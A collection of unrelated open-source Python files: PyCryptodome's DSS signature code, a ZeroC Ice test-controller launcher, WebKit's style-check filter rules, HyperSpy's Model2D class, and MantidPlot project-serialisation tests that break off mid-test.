else:
z2 = z1 - self._order
return self._int2octets(z2)
def _compute_nonce(self, mhash):
"""Generate k in a deterministic way"""
# See section 3.2 in RFC6979.txt
# Step a
h1 = mhash.digest()
# Step b
mask_v = bchr(1) * mhash.digest_size
# Step c
nonce_k = bchr(0) * mhash.digest_size
for int_oct in 0, 1:
# Step d/f
nonce_k = HMAC.new(nonce_k,
mask_v + bchr(int_oct) +
self._int2octets(self._private_key) +
self._bits2octets(h1), mhash).digest()
# Step e/g
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
nonce = -1
while not (0 < nonce < self._order):
# Step h.C (second part)
if nonce != -1:
nonce_k = HMAC.new(nonce_k, mask_v + bchr(0),
mhash).digest()
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
# Step h.A
mask_t = b("")
# Step h.B
while len(mask_t) < self._order_bytes:
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
mask_t += mask_v
# Step h.C (first part)
nonce = self._bits2int(mask_t)
return nonce
def _valid_hash(self, msg_hash):
return True
class FipsDsaSigScheme(DssSigScheme):
#: List of L (bit length of p) and N (bit length of q) combinations
#: that are allowed by FIPS 186-3. The security level is provided in
#: Table 2 of FIPS 800-57 (rev3).
_fips_186_3_L_N = (
(1024, 160), # 80 bits (SHA-1 or stronger)
(2048, 224), # 112 bits (SHA-224 or stronger)
(2048, 256), # 128 bits (SHA-256 or stronger)
(3072, 256) # 256 bits (SHA-512)
)
def __init__(self, key, encoding, order, randfunc):
super(FipsDsaSigScheme, self).__init__(key, encoding, order)
self._randfunc = randfunc
L = Integer(key.p).size_in_bits()
if (L, self._order_bits) not in self._fips_186_3_L_N:
error = ("L/N (%d, %d) is not compliant to FIPS 186-3"
% (L, self._order_bits))
raise ValueError(error)
def _compute_nonce(self, msg_hash):
# hash is not used
return Integer.random_range(min_inclusive=1,
max_exclusive=self._order,
randfunc=self._randfunc)
def _valid_hash(self, msg_hash):
"""Verify that SHA-1, SHA-2 or SHA-3 are used"""
return (msg_hash.oid == "1.3.14.3.2.26" or
msg_hash.oid.startswith("2.16.840.1.101.3.4.2."))
class FipsEcDsaSigScheme(DssSigScheme):
def __init__(self, key, encoding, order, randfunc):
super(FipsEcDsaSigScheme, self).__init__(key, encoding, order)
self._randfunc = randfunc
def _compute_nonce(self, msg_hash):
return Integer.random_range(min_inclusive=1,
max_exclusive=_curve.order,
randfunc=self._randfunc)
def _valid_hash(self, msg_hash):
"""Verify that SHA-[23] (256|384|512) bits are used to
match the 128-bit security of P-256"""
approved = ("2.16.840.1.101.3.4.2.1",
"2.16.840.1.101.3.4.2.2",
"2.16.840.1.101.3.4.2.3",
"2.16.840.1.101.3.4.2.8",
"2.16.840.1.101.3.4.2.9",
"2.16.840.1.101.3.4.2.10")
return msg_hash.oid in approved
def new(key, mode, encoding='binary', randfunc=None):
"""Return a signature scheme object `DSS_SigScheme` that
can be used to perform DSS signature or verification.
:Parameters:
key : a `Cryptodome.PublicKey.DSA` or `Cryptodome.PublicKey.ECC` key object
If the key has got its private half, both signature and
verification are possible.
If it only has the public half, verification is possible
but not signature generation.
For DSA keys, let *L* and *N* be the bit lengths of the modules *p*
and *q*: the combination *(L,N)* must appear in the following list,
in compliance to section 4.2 of `FIPS-186`__:
- (1024, 160)
- (2048, 224)
- (2048, 256)
- (3072, 256)
mode : string
The parameter can take these values:
- *'fips-186-3'*. The signature generation is carried out
according to `FIPS-186`__: the nonce *k* is taken from the RNG.
- *'deterministic-rfc6979'*. The signature generation
process does not rely on a random generator.
See RFC6979_.
encoding : string
How the signature is encoded. This value determines the output of
``sign`` and the input of ``verify``.
The following values are accepted:
- *'binary'* (default), the signature is the raw concatenation
of *r* and *s*. The size in bytes of the signature is always
two times the size of *q*.
- *'der'*, the signature is a DER encoded SEQUENCE with two
INTEGERs, *r* and *s*. The size of the signature is variable.
randfunc : callable
The source of randomness. If ``None``, the internal RNG is used.
Only used for the *'fips-186-3'* mode.
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
.. _RFC6979: http://tools.ietf.org/html/rfc6979
"""
# The goal of the 'mode' parameter is to avoid to
# have the current version of the standard as default.
#
# Over time, such version will be superseded by (for instance)
# FIPS 186-4 and it will be odd to have -3 as default.
if encoding not in ('binary', 'der'):
raise ValueError("Unknown encoding '%s'" % encoding)
if isinstance(key, EccKey):
order = _curve.order
private_key_attr = 'd'
else:
order = Integer(key.q)
private_key_attr = 'x'
if key.has_private():
private_key = getattr(key, private_key_attr)
else:
private_key = None
if mode == 'deterministic-rfc6979':
return DeterministicDsaSigScheme(key, encoding, order, private_key)
elif mode == 'fips-186-3':
if isinstance(key, EccKey):
return FipsEcDsaSigScheme(key, encoding, order, randfunc)
else:
return FipsDsaSigScheme(key, encoding, order, randfunc)
else:
raise ValueError("Unknown DSS mode '%s'" % mode)
| Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/Cryptodome/Signature/DSS.py | Python | gpl-2.0 | 15,276 |
#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2015 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, threading, subprocess, getopt, signal
path = [ ".", "..", "../..", "../../..", "../../../.." ]
head = os.path.dirname(sys.argv[0])
if len(head) > 0:
path = [os.path.join(head, p) for p in path]
path = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, "scripts", "TestUtil.py")) ]
if len(path) == 0:
raise RuntimeError("can't find toplevel directory!")
sys.path.append(os.path.join(path[0], "scripts"))
import TestUtil
def removeTrustSettings():
serverCert = os.path.join(path[0], "certs", "server.pem")
if os.system("security verify-cert -c " + serverCert + " >& /dev/null") == 0:
sys.stdout.write("removing trust settings for the HTTP server certificate... ")
sys.stdout.flush()
if os.system("security remove-trusted-cert " + serverCert) != 0:
print("\nerror: couldn't remove trust settings for the HTTP server certificate")
else:
print("ok")
else:
print("trust settings already removed")
#
# On OS X, provide an option to allow removing the trust settings
#
if TestUtil.isDarwin():
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["clean"])
if ("--clean", "") in opts:
removeTrustSettings()
sys.exit(0)
except getopt.GetoptError:
pass
version = "3.6.0"
jar = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..",
"java/test/controller/build/libs/testController-%(version)s.jar" % {"version": version})
javaHome = os.environ.get("JAVA_HOME", "")
javaCmd = '%s' % os.path.join(javaHome, "bin", "java") if javaHome else "java"
command = [javaCmd, "-jar", jar]
if len(sys.argv) > 1:
command += sys.argv[1:]
p = subprocess.Popen(command, shell = False, stdin = subprocess.PIPE, stdout = subprocess.PIPE,
stderr = subprocess.STDOUT, bufsize = 0)
def signal_handler(signal, frame):
if p:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if TestUtil.isDarwin():
#
# On OS X, we set the trust settings on the certificate to prevent
# the Web browsers from prompting the user about the unstrusted
# certificate. Some browsers such as Chrome don't provide the
# option to set this trust settings.
#
serverCert = os.path.join(TestUtil.toplevel, "certs", "server.pem")
if os.system("security verify-cert -c " + serverCert + " >& /dev/null") != 0:
sys.stdout.write("adding trust settings for the HTTP server certificate... ")
sys.stdout.flush()
if os.system("security add-trusted-cert -r trustAsRoot " + serverCert) != 0:
print("error: couldn't add trust settings for the HTTP server certificate")
print("ok")
print("run " + sys.argv[0] + " --clean to remove the trust setting")
while(True):
c = p.stdout.read(1)
if not c: break
if c == '\r': continue
# Depending on Python version and platform, the value c could be a
# string or a bytes object.
if type(c) != str:
c = c.decode()
sys.stdout.write(c)
sys.stdout.flush()
| elijah513/ice | scripts/TestController.py | Python | gpl-2.0 | 3,512 |
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
words, the user rules take precedence over the
everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_specific:
return False
if self.user_rules != other.user_rules:
return False
return True
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce this from __eq__().
return not self.__eq__(other)
# We use the prefix "_get" since the name "_path_specific_lower"
# is already taken up by the data attribute backing store.
def _get_path_specific_lower(self):
"""Return a copy of self._path_specific with the paths lower-cased."""
if self._path_specific_lower is None:
self._path_specific_lower = []
for (sub_paths, path_rules) in self._path_specific:
sub_paths = map(str.lower, sub_paths)
self._path_specific_lower.append((sub_paths, path_rules))
return self._path_specific_lower
def _path_rules_from_path(self, path):
"""Determine the path-specific rules to use, and return as a tuple."""
path = path.lower()
for (sub_paths, path_rules) in self._get_path_specific_lower():
for sub_path in sub_paths:
if path.find(sub_path) > -1:
return path_rules
return () # Default to the empty tuple.
def _filter_from_path_rules(self, path_rules):
"""Return the CategoryFilter associated to a path rules tuple."""
# We reuse the same CategoryFilter where possible to take
# advantage of the caching they do.
if path_rules not in self._path_rules_to_filter:
rules = list(self._base_rules) # Make a copy
rules.extend(path_rules)
rules.extend(self.user_rules)
self._path_rules_to_filter[path_rules] = _CategoryFilter(rules)
return self._path_rules_to_filter[path_rules]
def _filter_from_path(self, path):
"""Return the CategoryFilter associated to a path."""
if path not in self._path_to_filter:
path_rules = self._path_rules_from_path(path)
filter = self._filter_from_path_rules(path_rules)
self._path_to_filter[path] = filter
return self._path_to_filter[path]
def should_check(self, category, path):
"""Return whether the given category should be checked.
This method determines whether a category should be checked
by checking the category name against the filter rules for
the given path.
For a given path, the filter rules are the combination of
the base rules, the path-specific rules, and the user-provided
rules -- in that order. As we will describe below, later rules
in the list take precedence. The path-specific rules are the
rules corresponding to the first element of the "path_specific"
parameter that contains a string case-insensitively matching
some substring of the path. If there is no such element,
there are no path-specific rules for that path.
Given a list of filter rules, the logic for determining whether
a category should be checked is as follows. By default all
categories should be checked. Then apply the filter rules in
order from first to last, with later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
Args:
category: The category name.
path: The path of the file being checked.
"""
return self._filter_from_path(path).should_check(category)
| cattleprod/samsung-kernel-gt-i9100 | external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py | Python | gpl-2.0 | 11,910 |
# -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from hyperspy._signals.signal2d import Signal2D
from hyperspy.decorators import interactive_range_selector
from hyperspy.exceptions import WrongObjectError
from hyperspy.model import BaseModel, ModelComponents, ModelSpecialSlicers
class Model2D(BaseModel):
"""Model and data fitting for two dimensional signals.
A model is constructed as a linear combination of :mod:`components2D` that
are added to the model using :meth:`append` or :meth:`extend`. There
are many predifined components available in the in the :mod:`components2D`
module. If needed, new components can be created easily using the code of
existing components as a template.
Once defined, the model can be fitted to the data using :meth:`fit` or
:meth:`multifit`. Once the optimizer reaches the convergence criteria or
the maximum number of iterations the new value of the component parameters
are stored in the components.
It is possible to access the components in the model by their name or by
the index in the model. An example is given at the end of this docstring.
Note that methods are not yet defined for plotting 2D models or using
gradient based optimisation methods - these will be added soon.
Attributes
----------
signal : Signal2D instance
It contains the data to fit.
chisq : A Signal of floats
Chi-squared of the signal (or np.nan if not yet fit)
dof : A Signal of integers
Degrees of freedom of the signal (0 if not yet fit)
red_chisq : Signal instance
Reduced chi-squared.
components : `ModelComponents` instance
The components of the model are attributes of this class. This provides
a convinient way to access the model components when working in IPython
as it enables tab completion.
Methods
-------
append
Append one component to the model.
extend
Append multiple components to the model.
remove
Remove component from model.
fit, multifit
Fit the model to the data at the current position or the full dataset.
See also
--------
Base Model
Model1D
Example
-------
"""
def __init__(self, signal2D, dictionary=None):
super(Model2D, self).__init__()
self.signal = signal2D
self.axes_manager = self.signal.axes_manager
self._plot = None
self._position_widgets = {}
self._adjust_position_all = None
self._plot_components = False
self._suspend_update = False
self._model_line = None
self.xaxis, self.yaxis = np.meshgrid(
self.axes_manager.signal_axes[0].axis,
self.axes_manager.signal_axes[1].axis)
self.axes_manager.events.indices_changed.connect(
self._on_navigating, [])
self.channel_switches = np.ones(self.xaxis.shape, dtype=bool)
self.chisq = signal2D._get_navigation_signal()
self.chisq.change_dtype("float")
self.chisq.data.fill(np.nan)
self.chisq.metadata.General.title = (
self.signal.metadata.General.title + ' chi-squared')
self.dof = self.chisq._deepcopy_with_new_data(
np.zeros_like(self.chisq.data, dtype='int'))
self.dof.metadata.General.title = (
self.signal.metadata.General.title + ' degrees of freedom')
self.free_parameters_boundaries = None
self.convolved = False
self.components = ModelComponents(self)
if dictionary is not None:
self._load_dictionary(dictionary)
self.inav = ModelSpecialSlicers(self, True)
self.isig = ModelSpecialSlicers(self, False)
self._whitelist = {
'channel_switches': None,
'convolved': None,
'free_parameters_boundaries': None,
'chisq.data': None,
'dof.data': None}
self._slicing_whitelist = {
'channel_switches': 'isig',
'chisq.data': 'inav',
'dof.data': 'inav'}
@property
def signal(self):
return self._signal
@signal.setter
def signal(self, value):
if isinstance(value, Signal2D):
self._signal = value
else:
raise WrongObjectError(str(type(value)), 'Signal2D')
def __call__(self, non_convolved=True, onlyactive=False):
"""Returns the corresponding 2D model for the current coordinates
Parameters
----------
only_active : bool
If true, only the active components will be used to build the
model.
Returns
-------
numpy array
"""
sum_ = np.zeros_like(self.xaxis)
if onlyactive is True:
for component in self: # Cut the parameters list
if component.active:
np.add(sum_, component.function(self.xaxis, self.yaxis),
sum_)
else:
for component in self: # Cut the parameters list
np.add(sum_, component.function(self.xaxis, self.yaxis),
sum_)
return sum_[self.channel_switches]
def _errfunc(self, param, y, weights=None):
if weights is None:
weights = 1.
errfunc = self._model_function(param).ravel() - y
return errfunc * weights
def _set_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def set_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def _remove_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def remove_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def reset_signal_range(self):
raise NotImplementedError
def _add_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def add_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def reset_the_signal_range(self):
raise NotImplementedError
def _check_analytical_jacobian(self):
"""Check all components have analytical gradients.
If they do, return True and an empty string.
If they do not, return False and an error message.
"""
return False, "Analytical gradients not implemented for Model2D"
def _jacobian(self, param, y, weights=None):
raise NotImplementedError
def _function4odr(self, param, x):
raise NotImplementedError
def _jacobian4odr(self, param, x):
raise NotImplementedError
def _poisson_likelihood_function(self, param, y, weights=None):
raise NotImplementedError
def _gradient_ml(self, param, y, weights=None):
raise NotImplementedError
def _gradient_ls(self, param, y, weights=None):
raise NotImplementedError
def _huber_loss_function(self, param, y, weights=None, huber_delta=None):
raise NotImplementedError
def _gradient_huber(self, param, y, weights=None, huber_delta=None):
raise NotImplementedError
def _model2plot(self, axes_manager, out_of_range2nans=True):
old_axes_manager = None
if axes_manager is not self.axes_manager:
old_axes_manager = self.axes_manager
self.axes_manager = axes_manager
self.fetch_stored_values()
s = self.__call__(non_convolved=False, onlyactive=True)
if old_axes_manager is not None:
self.axes_manager = old_axes_manager
self.fetch_stored_values()
if out_of_range2nans is True:
ns = np.empty(self.xaxis.shape)
ns.fill(np.nan)
ns[np.where(self.channel_switches)] = s.ravel()
s = ns
return s
def plot(self, plot_components=False):
raise NotImplementedError
@staticmethod
def _connect_component_line(component):
raise NotImplementedError
@staticmethod
def _disconnect_component_line(component):
raise NotImplementedError
def _plot_component(self, component):
raise NotImplementedError
def enable_adjust_position(
self, components=None, fix_them=True, show_label=True):
raise NotImplementedError
def disable_adjust_position(self):
raise NotImplementedError
| erh3cq/hyperspy | hyperspy/models/model2d.py | Python | gpl-3.0 | 9,161 |
"""
Test of basic project saving and loading
"""
import mantidplottests
from mantidplottests import *
import shutil
import numpy as np
import re
from PyQt4 import QtGui, QtCore
class MantidPlotProjectSerialiseTest(unittest.TestCase):
def setUp(self):
self._project_name = "MantidPlotTestProject"
self._project_folder = os.path.join(os.path.expanduser("~"),
self._project_name)
file_name = "%s.mantid" % self._project_name
self._project_file = os.path.join(self._project_folder, file_name)
def tearDown(self):
# Clean up project files
if os.path.isdir(self._project_folder):
remove_folder(self._project_folder)
clear_mantid()
def test_project_file_with_no_data(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
saveProjectAs(self._project_folder)
self.assertTrue(os.path.isdir(self._project_folder))
self.assertTrue(os.path.isfile(self._project_file))
file_text = "MantidPlot 0.9.5 project file\n" \
"<scripting-lang>\tPython\n" \
"<windows>\t0\n" \
"<mantidworkspaces>\n" \
"WorkspaceNames\tfake_workspace\n" \
"</mantidworkspaces>"
exp_contents = parse_project_file(file_text)
contents = read_project_file(self._project_folder)
self.assertEqual(contents, exp_contents)
def test_project_file_with_plotted_spectrum(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 1)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
# Check corrent number of windows
self.assertEqual(int(contents['<windows>']), 1)
# Check workspace list was written
workspace_list = contents['mantidworkspaces']['WorkspaceNames']
self.assertEqual(workspace_list, workspace_name)
# Check plot was written
plot_titles = contents['multiLayer']['graph']['PlotTitle']
self.assertEqual(len(plot_titles), 3)
self.assertEqual(plot_titles[0], workspace_name)
def test_project_file_1D_plot_with_labels_modified(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1])
# modify axes labels
graph = windows()[0]
layer = graph.layer(1)
# call using threadsafe_call to ensure things are executed on the GUI
# thread, otherwise we get segfaults.
threadsafe_call(layer.setTitle, "Hello World")
threadsafe_call(layer.setAxisTitle, 0, "Y Axis Modified")
threadsafe_call(layer.setAxisTitle, 2, "X Axis Modified")
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
# Check corrent number of windows
self.assertEqual(int(contents['<windows>']), 1)
# Check plot title is correct
plot_title = contents['multiLayer']['graph']['PlotTitle']
self.assertEqual(len(plot_title), 3)
self.assertEqual(plot_title[0], "Hello World")
# Check axes titles are correct
axes_titles = contents['multiLayer']['graph']['AxesTitles']
self.assertEqual(len(axes_titles), 2)
self.assertEqual(axes_titles[0], 'X Axis Modified')
self.assertEqual(axes_titles[1], 'Y Axis Modified')
def test_project_file_1D_plot_with_error_bars(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 0, error_bars=True)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
error_bars = contents['multiLayer']['graph']['MantidYErrors']['1']
self.assertEqual(len(error_bars), 5)
def test_project_file_1D_plot_with_axes_scaling(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 0)
# modify axes scales
graph = windows()[0]
layer = graph.layer(1)
# call using threadsafe_call to ensure things are executed on the GUI
# thread. Otherwise we get segfaults.
threadsafe_call(layer.setAxisScale, 0, 10, 10)
threadsafe_call(layer.logYlinX)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
# Check axis scales are as expected
scales = contents['multiLayer']['graph']['scale']
scale1, scale2, scale3, scale4 = scales[0], scales[1], scales[2], scales[3]
self.assertAlmostEqual(float(scale1[1]), 110.6670313)
self.assertEqual(int(scale1[2]), 1000)
self.assertAlmostEqual(float(scale2[1]), 110.6670313)
self.assertEqual(int(scale2[2]), 1000)
self.assertEqual(int(scale3[1]), 0)
self.assertEqual(int(scale3[2]), 12)
self.assertEqual(int(scale4[1]), 0)
self.assertEqual(int(scale4[2]), 12)
def test_serialise_with_no_data(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 0)
self.assertEqual(len(mtd.getObjectNames()), 1)
def test_serialise_1D_plot_with_plotted_spectrum(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 1)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
def test_serialise_1D_plot_with_two_plot_windows(self):
create_dummy_workspace("ws1")
create_dummy_workspace("ws2")
plotSpectrum("ws1", 1)
plotSpectrum("ws2", 1)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 2)
self.assertEqual(len(mtd.getObjectNames()), 2)
# Check both windows are graph objects
for window in windows():
# slight hack as 'type' only returns
# an MDIWindow instance
self.assertTrue('Graph' in str(window))
def test_serialise_1D_plot_with_one_plot_and_multiple_spectra(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1])
self.save_and_reopen_project()
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(mtd.getObjectNames()), 1)
self.assertEqual(len(windows()), 1)
graph = windows()[0]
layer = graph.layer(1)
# Check graph and layer exist
self.assertTrue('Graph' in str(graph))
self.assertTrue(layer is not None)
# Check plot curves exist
curve1 = layer.curve(0)
curve2 = layer.curve(1)
self.assertTrue('QwtPlotCurve', str(type(curve1)))
self.assertTrue('QwtPlotCurve', str(type(curve2)))
def test_serialise_waterfall_plot(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, [0, 1], waterfall=True)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
# Check window exists
graph = windows()[0]
self.assertTrue('Graph' in str(graph))
# Check plot curves exist
layer = graph.layer(1)
curve1 = layer.curve(0)
curve2 = layer.curve(1)
self.assertTrue('QwtPlotCurve', str(type(curve1)))
self.assertTrue('QwtPlotCurve', str(type(curve2)))
def test_serialise_2D_plot(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plot2D(workspace_name)
self.save_and_reopen_project()
# Check that objects were reloaded
self.assertEqual(rootFolder().name(), self._project_name)
self.assertEqual(len(windows()), 1)
self.assertEqual(len(mtd.getObjectNames()), 1)
# Check window exists
graph = windows()[0]
self.assertTrue('Graph' in str(graph))
def test_save_instrument_view(self):
workspace_name = 'fake_workspace'
instrument_name = 'IRIS'
# make a workspace with an instrument
CreateSampleWorkspace(OutputWorkspace=workspace_name)
LoadInstrument(Workspace=workspace_name, MonitorList='1,2',
InstrumentName=instrument_name, RewriteSpectraMap=True)
window = getInstrumentView(workspace_name)
render_tab = window.getTab("Render")
# range options
render_tab.setMinValue(1.25)
render_tab.setMaxValue(1.75)
render_tab.setRange(1.35,1.85)
render_tab.showAxes(True)
# display options
render_tab.displayDetectorsOnly(True)
render_tab.setColorMapAutoscaling(True)
render_tab.setSurfaceType(InstrumentWidgetRenderTab.CYLINDRICAL_Y)
render_tab.flipUnwrappedView(True)
# pick tab
pick_tab = window.getTab(InstrumentWidget.PICK)
pick_tab.selectTool(InstrumentWidgetPickTab.PeakSelect)
# mask tab
mask_tab = window.getTab(InstrumentWidget.MASK)
mask_tab.setMode(InstrumentWidgetMaskTab.Group)
mask_tab.selectTool(InstrumentWidgetMaskTab.DrawEllipse)
tree_tab = window.getTab(InstrumentWidget.TREE)
tree_tab.selectComponentByName("graphite")
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
window_options = contents['instrumentwindow']
self.assertEquals(int(window_options['SurfaceType']), 2)
self.assertEquals(int(window_options['CurrentTab']), 0)
# render tab options
render_options = contents['instrumentwindow']['tabs']['rendertab']
self.assertEqual(bool(render_options["DisplayDetectorsOnly"]), True)
self.assertEqual(bool(render_options["AutoScaling"]), True)
self.assertEqual(bool(render_options["FlipView"]), True)
# pick tab options
pick_options = contents['instrumentwindow']['tabs']['picktab']
self.assertEqual(bool(pick_options['ActiveTools'][9]), True)
# mask tab options
mask_options = contents['instrumentwindow']['tabs']['masktab']
